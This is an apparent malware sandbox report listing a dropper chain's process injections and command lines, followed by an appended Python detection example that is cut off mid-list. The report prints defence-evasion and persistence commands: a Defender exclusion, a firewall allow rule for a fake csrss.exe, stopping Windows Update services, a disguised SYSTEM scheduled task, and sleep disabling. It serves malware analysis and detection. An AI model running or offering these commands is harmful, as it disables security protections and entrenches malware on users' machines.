Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1534848907-968546671-3000393597-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2704 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe
PID 2704 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe
PID 2704 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe
PID 2748 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe
PID 2748 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe
PID 2748 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe
PID 3444 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe
PID 3444 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe
PID 3444 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe
PID 1020 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe
PID 1020 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe
PID 1020 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe
PID 1020 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe
PID 1020 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe
PID 1020 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1448 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3444 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe
PID 3444 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe
PID 3444 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe
PID 4812 wrote to memory of 3060 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4812 wrote to memory of 3060 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

Processes

C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe

"C:\Users\Admin\AppData\Local\Temp\07c4920f5c66596a251747f990cfa98978bff45cc386455ea25c61f79b45d4f0.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TW3sZ59.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Aa8pO64.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WB0gv59.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1SM46dE0.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7TS92kq.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8sm756gN.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8sm756gN.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9dc5kt9.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9dc5kt9.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\7078.exe

C:\Users\Admin\AppData\Local\Temp\7078.exe

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\A024.exe

C:\Users\Admin\AppData\Local\Temp\A024.exe

C:\Users\Admin\AppData\Local\Temp\A4D8.exe

C:\Users\Admin\AppData\Local\Temp\A4D8.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\forc.exe

"C:\Users\Admin\AppData\Local\Temp\forc.exe"

C:\Users\Admin\AppData\Local\Temp\A4D8.exe

C:\Users\Admin\AppData\Local\Temp\A4D8.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1064.exe

C:\Users\Admin\AppData\Local\Temp\1064.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\6D2B.exe

C:\Users\Admin\AppData\Local\Temp\6D2B.exe

C:\Users\Admin\AppData\Local\Temp\7143.exe

C:\Users\Admin\AppData\Local\Temp\7143.exe

C:\Users\Admin\AppData\Local\Temp\73F4.exe

C:\Users\Admin\AppData\Local\Temp\73F4.exe

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\ttdegdw

C:\Users\Admin\AppData\Roaming\ttdegdw

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile
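Added triage example, not part of the sandbox output: the defence-evasion and persistence command lines listed above (the Defender exclusion, the netsh rule for C:\Windows\rss\csrss.exe, the sc stop of the update services, the SYSTEM scheduled task for C:\Program Files\Google\Chrome\updater.exe, the powercfg timeouts, the extensionless binary under AppData\Roaming and the AppLaunch.exe child of a Temp dropper) expressed as detection checks and run over constructed process-creation events. The event dicts, their field names (parent, image, cmd), the regexes and the ATT&CK numbers are this example's assumptions; parent is filled in only where the report's WriteProcessMemory rows show it, and the -Settings clause of the scheduled-task line is left out of the sample.

```python
"""Added example, not part of the sandbox report: detection checks run over
process-creation events shaped after the command lines in the Processes list.

EVENTS and its field names (parent, image, cmd) are constructed for this
example; parent is filled only where the report's WriteProcessMemory table
shows it. Regexes and ATT&CK mapping are this example's own heuristics."""
import re

EVENTS = [
    {"parent": r"C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2nz6721.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe",
     "cmd": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"'},
    {"parent": "", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference "
            r"-ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"},
    {"parent": "", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" '
            r'dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"'},
    {"parent": "", "image": r"C:\Windows\system32\netsh.exe",
     "cmd": r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow '
            r'program="C:\Windows\rss\csrss.exe" enable=yes'},
    {"parent": "", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc "
            r"& sc stop wuauserv & sc stop bits & sc stop dosvc"},
    *({"parent": "", "image": r"C:\Windows\System32\sc.exe", "cmd": f"sc stop {svc}"}
      for svc in ("UsoSvc", "WaaSMedicSvc", "wuauserv", "bits", "dosvc")),
    {"parent": "", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # the -Settings clause of the original line is left out of this sample
     "cmd": r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> '
            r'IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") '
            r"{ schtasks /create /f /sc onlogon /rl highest /ru 'System' "
            r"/tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } "
            r"Else { Register-ScheduledTask -Action (New-ScheduledTaskAction "
            r"-Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger "
            r"(New-ScheduledTaskTrigger -AtStartup) -TaskName 'GoogleUpdateTaskMachineQC' "
            r"-User 'System' -RunLevel 'Highest' -Force; }"},
    {"parent": "", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & "
            r"powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & "
            r"powercfg /x -standby-timeout-dc 0"},
    {"parent": "", "image": r"C:\Users\Admin\AppData\Roaming\ttdegdw",
     "cmd": r"C:\Users\Admin\AppData\Roaming\ttdegdw"},
    {"parent": "", "image": r"C:\Windows\rss\csrss.exe", "cmd": r"C:\Windows\rss\csrss.exe"},
    # a line from the same list that should stay quiet: running a task is not creating one
    {"parent": "", "image": r"C:\Windows\System32\schtasks.exe",
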